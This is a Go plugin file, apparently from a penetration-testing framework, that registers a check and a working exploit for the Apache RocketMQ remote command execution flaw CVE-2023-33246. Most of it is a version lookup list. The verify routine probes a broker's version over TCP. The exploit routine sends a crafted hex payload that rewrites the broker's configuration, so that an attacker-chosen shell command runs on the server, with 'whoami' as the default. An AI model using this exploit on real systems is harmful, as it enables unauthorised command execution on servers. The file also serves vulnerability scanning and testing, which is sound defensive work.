package exploits

import (
	"encoding/hex"
	"encoding/json"
	"fmt"
	"net"
	"prismx_cli/core/models"
	"prismx_cli/utils/netUtils"
	"strconv"
	"strings"
	"time"
)

// init 注册插件插件
func init() {
	var version_list = []string{"V3_0_0_SNAPSHOT", "V3_0_0_ALPHA1", "V3_0_0_BETA1", "V3_0_0_BETA2", "V3_0_0_BETA3", "V3_0_0_BETA4",
		"V3_0_0_BETA5", "V3_0_0_BETA6_SNAPSHOT", "V3_0_0_BETA6", "V3_0_0_BETA7_SNAPSHOT", "V3_0_0_BETA7",
		"V3_0_0_BETA8_SNAPSHOT", "V3_0_0_BETA8", "V3_0_0_BETA9_SNAPSHOT", "V3_0_0_BETA9", "V3_0_0_FINAL",
		"V3_0_1_SNAPSHOT", "V3_0_1", "V3_0_2_SNAPSHOT", "V3_0_2", "V3_0_3_SNAPSHOT", "V3_0_3",
		"V3_0_4_SNAPSHOT", "V3_0_4", "V3_0_5_SNAPSHOT", "V3_0_5", "V3_0_6_SNAPSHOT", "V3_0_6",
		"V3_0_7_SNAPSHOT", "V3_0_7", "V3_0_8_SNAPSHOT", "V3_0_8", "V3_0_9_SNAPSHOT", "V3_0_9",
		"V3_0_10_SNAPSHOT", "V3_0_10", "V3_0_11_SNAPSHOT", "V3_0_11", "V3_0_12_SNAPSHOT", "V3_0_12",
		"V3_0_13_SNAPSHOT", "V3_0_13", "V3_0_14_SNAPSHOT", "V3_0_14", "V3_0_15_SNAPSHOT", "V3_0_15",
		"V3_1_0_SNAPSHOT", "V3_1_0", "V3_1_1_SNAPSHOT", "V3_1_1", "V3_1_2_SNAPSHOT", "V3_1_2",
		"V3_1_3_SNAPSHOT", "V3_1_3", "V3_1_4_SNAPSHOT", "V3_1_4", "V3_1_5_SNAPSHOT", "V3_1_5",
		"V3_1_6_SNAPSHOT", "V3_1_6", "V3_1_7_SNAPSHOT", "V3_1_7", "V3_1_8_SNAPSHOT", "V3_1_8",
		"V3_1_9_SNAPSHOT", "V3_1_9", "V3_2_0_SNAPSHOT", "V3_2_0", "V3_2_1_SNAPSHOT", "V3_2_1",
		"V3_2_2_SNAPSHOT", "V3_2_2", "V3_2_3_SNAPSHOT", "V3_2_3", "V3_2_4_SNAPSHOT", "V3_2_4",
		"V3_2_5_SNAPSHOT", "V3_2_5", "V3_2_6_SNAPSHOT", "V3_2_6", "V3_2_7_SNAPSHOT", "V3_2_7",
		"V3_2_8_SNAPSHOT", "V3_2_8", "V3_2_9_SNAPSHOT", "V3_2_9", "V3_3_1_SNAPSHOT", "V3_3_1",
		"V3_3_2_SNAPSHOT", "V3_3_2", "V3_3_3_SNAPSHOT", "V3_3_3", "V3_3_4_SNAPSHOT", "V3_3_4",
		"V3_3_5_SNAPSHOT", "V3_3_5", "V3_3_6_SNAPSHOT", "V3_3_6", "V3_3_7_SNAPSHOT", "V3_3_7",
		"V3_3_8_SNAPSHOT", "V3_3_8", "V3_3_9_SNAPSHOT", "V3_3_9", "V3_4_1_SNAPSHOT", "V3_4_1",
		"V3_4_2_SNAPSHOT", "V3_4_2", "V3_4_3_SNAPSHOT", "V3_4_3", "V3_4_4_SNAPSHOT", "V3_4_4",
		"V3_4_5_SNAPSHOT", "V3_4_5", "V3_4_6_SNAPSHOT", "V3_4_6", "V3_4_7_SNAPSHOT", "V3_4_7",
		"V3_4_8_SNAPSHOT", "V3_4_8", "V3_4_9_SNAPSHOT", "V3_4_9", "V3_5_1_SNAPSHOT", "V3_5_1",
		"V3_5_2_SNAPSHOT", "V3_5_2", "V3_5_3_SNAPSHOT", "V3_5_3", "V3_5_4_SNAPSHOT", "V3_5_4",
		"V3_5_5_SNAPSHOT", "V3_5_5", "V3_5_6_SNAPSHOT", "V3_5_6", "V3_5_7_SNAPSHOT", "V3_5_7",
		"V3_5_8_SNAPSHOT", "V3_5_8", "V3_5_9_SNAPSHOT", "V3_5_9", "V3_6_1_SNAPSHOT", "V3_6_1",
		"V3_6_2_SNAPSHOT", "V3_6_2", "V3_6_3_SNAPSHOT", "V3_6_3", "V3_6_4_SNAPSHOT", "V3_6_4",
		"V3_6_5_SNAPSHOT", "V3_6_5", "V3_6_6_SNAPSHOT", "V3_6_6", "V3_6_7_SNAPSHOT", "V3_6_7",
		"V3_6_8_SNAPSHOT", "V3_6_8", "V3_6_9_SNAPSHOT", "V3_6_9", "V3_7_1_SNAPSHOT", "V3_7_1",
		"V3_7_2_SNAPSHOT", "V3_7_2", "V3_7_3_SNAPSHOT", "V3_7_3", "V3_7_4_SNAPSHOT", "V3_7_4",
		"V3_7_5_SNAPSHOT", "V3_7_5", "V3_7_6_SNAPSHOT", "V3_7_6", "V3_7_7_SNAPSHOT", "V3_7_7",
		"V3_7_8_SNAPSHOT", "V3_7_8", "V3_7_9_SNAPSHOT", "V3_7_9", "V3_8_1_SNAPSHOT", "V3_8_1",
		"V3_8_2_SNAPSHOT", "V3_8_2", "V3_8_3_SNAPSHOT", "V3_8_3", "V3_8_4_SNAPSHOT", "V3_8_4",
		"V3_8_5_SNAPSHOT", "V3_8_5", "V3_8_6_SNAPSHOT", "V3_8_6", "V3_8_7_SNAPSHOT", "V3_8_7",
		"V3_8_8_SNAPSHOT", "V3_8_8", "V3_8_9_SNAPSHOT", "V3_8_9", "V3_9_1_SNAPSHOT", "V3_9_1",
		"V3_9_2_SNAPSHOT", "V3_9_2", "V3_9_3_SNAPSHOT", "V3_9_3", "V3_9_4_SNAPSHOT", "V3_9_4",
		"V3_9_5_SNAPSHOT", "V3_9_5", "V3_9_6_SNAPSHOT", "V3_9_6", "V3_9_7_SNAPSHOT", "V3_9_7",
		"V3_9_8_SNAPSHOT", "V3_9_8", "V3_9_9_SNAPSHOT", "V3_9_9", "V4_0_0_SNAPSHOT", "V4_0_0",
		"V4_0_1_SNAPSHOT", "V4_0_1", "V4_0_2_SNAPSHOT", "V4_0_2", "V4_0_3_SNAPSHOT", "V4_0_3",
		"V4_0_4_SNAPSHOT", "V4_0_4", "V4_0_5_SNAPSHOT", "V4_0_5", "V4_0_6_SNAPSHOT", "V4_0_6",
		"V4_0_7_SNAPSHOT", "V4_0_7", "V4_0_8_SNAPSHOT", "V4_0_8", "V4_0_9_SNAPSHOT", "V4_0_9",
		"V4_1_0_SNAPSHOT", "V4_1_0", "V4_1_1_SNAPSHOT", "V4_1_1", "V4_1_2_SNAPSHOT", "V4_1_2",
		"V4_1_3_SNAPSHOT", "V4_1_3", "V4_1_4_SNAPSHOT", "V4_1_4", "V4_1_5_SNAPSHOT", "V4_1_5",
		"V4_1_6_SNAPSHOT", "V4_1_6", "V4_1_7_SNAPSHOT", "V4_1_7", "V4_1_8_SNAPSHOT", "V4_1_8",
		"V4_1_9_SNAPSHOT", "V4_1_9", "V4_2_0_SNAPSHOT", "V4_2_0", "V4_2_1_SNAPSHOT", "V4_2_1",
		"V4_2_2_SNAPSHOT", "V4_2_2", "V4_2_3_SNAPSHOT", "V4_2_3", "V4_2_4_SNAPSHOT", "V4_2_4",
		"V4_2_5_SNAPSHOT", "V4_2_5", "V4_2_6_SNAPSHOT", "V4_2_6", "V4_2_7_SNAPSHOT", "V4_2_7",
		"V4_2_8_SNAPSHOT", "V4_2_8", "V4_2_9_SNAPSHOT", "V4_2_9", "V4_3_0_SNAPSHOT", "V4_3_0",
		"V4_3_1_SNAPSHOT", "V4_3_1", "V4_3_2_SNAPSHOT", "V4_3_2", "V4_3_3_SNAPSHOT", "V4_3_3",
		"V4_3_4_SNAPSHOT", "V4_3_4", "V4_3_5_SNAPSHOT", "V4_3_5", "V4_3_6_SNAPSHOT", "V4_3_6",
		"V4_3_7_SNAPSHOT", "V4_3_7", "V4_3_8_SNAPSHOT", "V4_3_8", "V4_3_9_SNAPSHOT", "V4_3_9",
		"V4_4_0_SNAPSHOT", "V4_4_0", "V4_4_1_SNAPSHOT", "V4_4_1", "V4_4_2_SNAPSHOT", "V4_4_2",
		"V4_4_3_SNAPSHOT", "V4_4_3", "V4_4_4_SNAPSHOT", "V4_4_4", "V4_4_5_SNAPSHOT", "V4_4_5",
		"V4_4_6_SNAPSHOT", "V4_4_6", "V4_4_7_SNAPSHOT", "V4_4_7", "V4_4_8_SNAPSHOT", "V4_4_8",
		"V4_4_9_SNAPSHOT", "V4_4_9", "V4_5_0_SNAPSHOT", "V4_5_0", "V4_5_1_SNAPSHOT", "V4_5_1",
		"V4_5_2_SNAPSHOT", "V4_5_2", "V4_5_3_SNAPSHOT", "V4_5_3", "V4_5_4_SNAPSHOT", "V4_5_4",
		"V4_5_5_SNAPSHOT", "V4_5_5", "V4_5_6_SNAPSHOT", "V4_5_6", "V4_5_7_SNAPSHOT", "V4_5_7",
		"V4_5_8_SNAPSHOT", "V4_5_8", "V4_5_9_SNAPSHOT", "V4_5_9", "V4_6_0_SNAPSHOT", "V4_6_0",
		"V4_6_1_SNAPSHOT", "V4_6_1", "V4_6_2_SNAPSHOT", "V4_6_2", "V4_6_3_SNAPSHOT", "V4_6_3",
		"V4_6_4_SNAPSHOT", "V4_6_4", "V4_6_5_SNAPSHOT", "V4_6_5", "V4_6_6_SNAPSHOT", "V4_6_6",
		"V4_6_7_SNAPSHOT", "V4_6_7", "V4_6_8_SNAPSHOT", "V4_6_8", "V4_6_9_SNAPSHOT", "V4_6_9",
		"V4_7_0_SNAPSHOT", "V4_7_0", "V4_7_1_SNAPSHOT", "V4_7_1", "V4_7_2_SNAPSHOT", "V4_7_2",
		"V4_7_3_SNAPSHOT", "V4_7_3", "V4_7_4_SNAPSHOT", "V4_7_4", "V4_7_5_SNAPSHOT", "V4_7_5",
		"V4_7_6_SNAPSHOT", "V4_7_6", "V4_7_7_SNAPSHOT", "V4_7_7", "V4_7_8_SNAPSHOT", "V4_7_8",
		"V4_7_9_SNAPSHOT", "V4_7_9", "V4_8_0_SNAPSHOT", "V4_8_0", "V4_8_1_SNAPSHOT", "V4_8_1",
		"V4_8_2_SNAPSHOT", "V4_8_2", "V4_8_3_SNAPSHOT", "V4_8_3", "V4_8_4_SNAPSHOT", "V4_8_4",
		"V4_8_5_SNAPSHOT", "V4_8_5", "V4_8_6_SNAPSHOT", "V4_8_6", "V4_8_7_SNAPSHOT", "V4_8_7",
		"V4_8_8_SNAPSHOT", "V4_8_8", "V4_8_9_SNAPSHOT", "V4_8_9", "V4_9_0_SNAPSHOT", "V4_9_0",
		"V4_9_1_SNAPSHOT", "V4_9_1", "V4_9_2_SNAPSHOT", "V4_9_2", "V4_9_3_SNAPSHOT", "V4_9_3",
		"V4_9_4_SNAPSHOT", "V4_9_4", "V4_9_5_SNAPSHOT", "V4_9_5", "V4_9_6_SNAPSHOT", "V4_9_6",
		"V4_9_7_SNAPSHOT", "V4_9_7", "V4_9_8_SNAPSHOT", "V4_9_8", "V4_9_9_SNAPSHOT", "V4_9_9",
		"V5_0_0_SNAPSHOT", "V5_0_0", "V5_0_1_SNAPSHOT", "V5_0_1", "V5_0_2_SNAPSHOT", "V5_0_2",
		"V5_0_3_SNAPSHOT", "V5_0_3", "V5_0_4_SNAPSHOT", "V5_0_4", "V5_0_5_SNAPSHOT", "V5_0_5",
		"V5_0_6_SNAPSHOT", "V5_0_6", "V5_0_7_SNAPSHOT", "V5_0_7", "V5_0_8_SNAPSHOT", "V5_0_8",
		"V5_0_9_SNAPSHOT", "V5_0_9", "V5_1_0_SNAPSHOT", "V5_1_0", "V5_1_1_SNAPSHOT", "V5_1_1",
		"V5_1_2_SNAPSHOT", "V5_1_2", "V5_1_3_SNAPSHOT", "V5_1_3", "V5_1_4_SNAPSHOT", "V5_1_4",
		"V5_1_5_SNAPSHOT", "V5_1_5", "V5_1_6_SNAPSHOT", "V5_1_6", "V5_1_7_SNAPSHOT", "V5_1_7",
		"V5_1_8_SNAPSHOT", "V5_1_8", "V5_1_9_SNAPSHOT", "V5_1_9", "V5_2_0_SNAPSHOT", "V5_2_0",
		"V5_2_1_SNAPSHOT", "V5_2_1", "V5_2_2_SNAPSHOT", "V5_2_2", "V5_2_3_SNAPSHOT", "V5_2_3",
		"V5_2_4_SNAPSHOT", "V5_2_4", "V5_2_5_SNAPSHOT", "V5_2_5", "V5_2_6_SNAPSHOT", "V5_2_6",
		"V5_2_7_SNAPSHOT", "V5_2_7", "V5_2_8_SNAPSHOT", "V5_2_8", "V5_2_9_SNAPSHOT", "V5_2_9",
		"V5_3_0_SNAPSHOT", "V5_3_0", "V5_3_1_SNAPSHOT", "V5_3_1", "V5_3_2_SNAPSHOT", "V5_3_2",
		"V5_3_3_SNAPSHOT", "V5_3_3", "V5_3_4_SNAPSHOT", "V5_3_4", "V5_3_5_SNAPSHOT", "V5_3_5",
		"V5_3_6_SNAPSHOT", "V5_3_6", "V5_3_7_SNAPSHOT", "V5_3_7", "V5_3_8_SNAPSHOT", "V5_3_8",
		"V5_3_9_SNAPSHOT", "V5_3_9", "V5_4_0_SNAPSHOT", "V5_4_0", "V5_4_1_SNAPSHOT", "V5_4_1",
		"V5_4_2_SNAPSHOT", "V5_4_2", "V5_4_3_SNAPSHOT", "V5_4_3", "V5_4_4_SNAPSHOT", "V5_4_4",
		"V5_4_5_SNAPSHOT", "V5_4_5", "V5_4_6_SNAPSHOT", "V5_4_6", "V5_4_7_SNAPSHOT", "V5_4_7",
		"V5_4_8_SNAPSHOT", "V5_4_8", "V5_4_9_SNAPSHOT", "V5_4_9", "V5_5_0_SNAPSHOT", "V5_5_0",
		"V5_5_1_SNAPSHOT", "V5_5_1", "V5_5_2_SNAPSHOT", "V5_5_2", "V5_5_3_SNAPSHOT", "V5_5_3",
		"V5_5_4_SNAPSHOT", "V5_5_4", "V5_5_5_SNAPSHOT", "V5_5_5", "V5_5_6_SNAPSHOT", "V5_5_6",
		"V5_5_7_SNAPSHOT", "V5_5_7", "V5_5_8_SNAPSHOT", "V5_5_8", "V5_5_9_SNAPSHOT", "V5_5_9",
		"V5_6_0_SNAPSHOT", "V5_6_0", "V5_6_1_SNAPSHOT", "V5_6_1", "V5_6_2_SNAPSHOT", "V5_6_2",
		"V5_6_3_SNAPSHOT", "V5_6_3", "V5_6_4_SNAPSHOT", "V5_6_4", "V5_6_5_SNAPSHOT", "V5_6_5",
		"V5_6_6_SNAPSHOT", "V5_6_6", "V5_6_7_SNAPSHOT", "V5_6_7", "V5_6_8_SNAPSHOT", "V5_6_8",
		"V5_6_9_SNAPSHOT", "V5_6_9", "V5_7_0_SNAPSHOT", "V5_7_0", "V5_7_1_SNAPSHOT", "V5_7_1",
		"V5_7_2_SNAPSHOT", "V5_7_2", "V5_7_3_SNAPSHOT", "V5_7_3", "V5_7_4_SNAPSHOT", "V5_7_4",
		"V5_7_5_SNAPSHOT", "V5_7_5", "V5_7_6_SNAPSHOT", "V5_7_6", "V5_7_7_SNAPSHOT", "V5_7_7",
		"V5_7_8_SNAPSHOT", "V5_7_8", "V5_7_9_SNAPSHOT", "V5_7_9", "V5_8_0_SNAPSHOT", "V5_8_0",
		"V5_8_1_SNAPSHOT", "V5_8_1", "V5_8_2_SNAPSHOT", "V5_8_2", "V5_8_3_SNAPSHOT", "V5_8_3",
		"V5_8_4_SNAPSHOT", "V5_8_4", "V5_8_5_SNAPSHOT", "V5_8_5", "V5_8_6_SNAPSHOT", "V5_8_6",
		"V5_8_7_SNAPSHOT", "V5_8_7", "V5_8_8_SNAPSHOT", "V5_8_8", "V5_8_9_SNAPSHOT", "V5_8_9",
		"V5_9_0_SNAPSHOT", "V5_9_0", "V5_9_1_SNAPSHOT", "V5_9_1", "V5_9_2_SNAPSHOT", "V5_9_2",
		"V5_9_3_SNAPSHOT", "V5_9_3", "V5_9_4_SNAPSHOT", "V5_9_4", "V5_9_5_SNAPSHOT", "V5_9_5",
		"V5_9_6_SNAPSHOT", "V5_9_6", "V5_9_7_SNAPSHOT", "V5_9_7", "V5_9_8_SNAPSHOT", "V5_9_8",
		"V5_9_9_SNAPSHOT", "V5_9_9", "HIGHER_VERSION"}

	models.Register(models.AppVulInfo{
		App:   "rocketmq-broker",
		Query: "app:\"RocketMQ Broker\"",
		Meta: models.VulMeta{
			Name:        "Apache_RocketMQ_RCE CVE-2023-33246",
			Tags:        []string{"remote_code_execution"},
			Author:      "一曲成殇",
			Description: "该漏洞存在于Apache RocketMQ中，是一个远程命令执行漏洞。RocketMQ的NameServer、Broker、Controller等多个组件缺乏权限验证，攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外，攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。",
			Homepage:    "https://rocketmq.apache.org/",
			Level:       5,
			References:  "https://cert.360.cn/warning/detail?id=64784de801dc7167b394d4dd",
			Solution:    "根据影响版本中的信息，排查并升级到安全版本，或直接访问参考链接获取官方更新指南。",
			CreateAt:    "2021-10-04",
			Available:   true,
			Steps: models.StepsMeta{
				VerifySteps: models.VerifySteps{
					VerifyGo: func(scheme, ip string, port int, duration time.Duration) (result models.VulResult) {

						getMinorVersion := func(targetVersion string) int {
							parts := strings.Split(targetVersion, ".")
							if len(parts) < 3 {
								return 0
							}
							var minorVersion int
							_, err := fmt.Sscanf(parts[2], "%d", &minorVersion)
							if err != nil {
								return 0
							}
							return minorVersion
						}

						conn, err := netUtils.SendDialTimeout("tcp", net.JoinHostPort(ip, strconv.Itoa(port)), duration)
						if err != nil {
							result.Response = err.Error()
							return
						}

						defer conn.Close()

						payload, err := hex.DecodeString(`00000064000000607b22636f6465223a32382c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3433337d`)
						if err != nil {
							result.Response = err.Error()
							return
						}

						if _, err = conn.Write(payload); err != nil {
							result.Response = err.Error()
							return
						}

						resp := make([]byte, 2048)

						n, err := conn.Read(resp)
						if err != nil {
							result.Response = err.Error()
							return
						}

						if len(resp) < 8 {
							result.Response = string(resp)
							return
						}

						result.Response = fmt.Sprintf("%s Not vulnerable to CVE-2023-33246 RocketMQ RCE\n", net.JoinHostPort(ip, strconv.Itoa(port)))
						data := string(resp[8:])

						if strings.HasPrefix(data, "{") {
							var p1, p2 string
							if strings.Contains(data, "}{") {
								parts := strings.SplitN(data, "}{", 2)
								p1, p2 = parts[0]+"}", "{"+parts[1]
								p2 = strings.ReplaceAll(p2, ":{"+fmt.Sprintf("%d", 0)+":", ":{\""+fmt.Sprintf("%d", 0)+"\":")
								p2 = strings.ReplaceAll(p2, fmt.Sprintf("%d", 0)+":\"", "\""+fmt.Sprintf("%d", 0)+"\":\"")
							} else {
								p1 = data
							}
							var status map[string]interface{}
							if err = json.Unmarshal([]byte(p1), &status); err != nil {
								result.Response = err.Error()
								return
							}
							if version := status["version"]; version != nil {
								targetVersion := version_list[int(version.(float64))]
								targetVersion = strings.ReplaceAll(targetVersion, "_", ".")
								if strings.HasPrefix(targetVersion, "V4.9.") {
									if getMinorVersion(targetVersion) < 6 {
										result.Request = string(payload)
										result.Response = string(resp[:n])
										result.State = true
									} else {
										result.Response = fmt.Sprintf("%s Not vulnerable to CVE-2023-33246 RocketMQ RCE, version: %s >= V4.9.6\n", net.JoinHostPort(ip, strconv.Itoa(port)), targetVersion)
									}
								} else if strings.HasPrefix(targetVersion, "V5.1.") {
									if getMinorVersion(targetVersion) < 1 {
										result.Request = string(payload)
										result.Response = string(resp[:n])
										result.State = true
									} else {
										result.Response = fmt.Sprintf("%s Not Vulnerable to CVE-2023-33246 RocketMQ RCE, version: %s >= V5.1.1\n", net.JoinHostPort(ip, strconv.Itoa(port)), targetVersion)
									}
								} else {
									result.Response = fmt.Sprintf("%s Not vulnerable to CVE-2023-33246 RocketMQ RCE, version: %s\n", net.JoinHostPort(ip, strconv.Itoa(port)), targetVersion)
								}
							}
						}
						return
					},
				},
				ExploitSteps: models.ExploitSteps{
					Params: models.ExploitParams{
						Name:  "执行命令",
						Type:  "input",
						Value: "whoami",
					},
					ExploitGo: func(scheme, ip string, port int, payload string, duration time.Duration) (result models.VulResult) {

						payload = "000000cd000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f20" + hex.EncodeToString([]byte(payload)) + "3b0a"
						payload = strings.ReplaceAll(payload, "000000cd000000", "000000"+fmt.Sprintf("%02x", len(payload)/2-4)+"000000")
						payloadBytes, err := hex.DecodeString(payload)
						if err != nil {
							result.Response = err.Error()
							return
						}
						conn, err := netUtils.SendDialTimeout("tcp", net.JoinHostPort(ip, strconv.Itoa(port)), duration)
						if err != nil {
							result.Response = err.Error()
							return
						}
						if _, err = conn.Write(payloadBytes); err != nil {
							result.Response = err.Error()
							return
						}
						buf := make([]byte, 2048)
						n, err := conn.Read(buf)
						if err != nil {
							result.Response = err.Error()
							return
						}
						result.Request = string(payloadBytes)
						result.Response = string(buf[:n])
						result.State = true
						return
					},
				},
			},
		},
	})
}
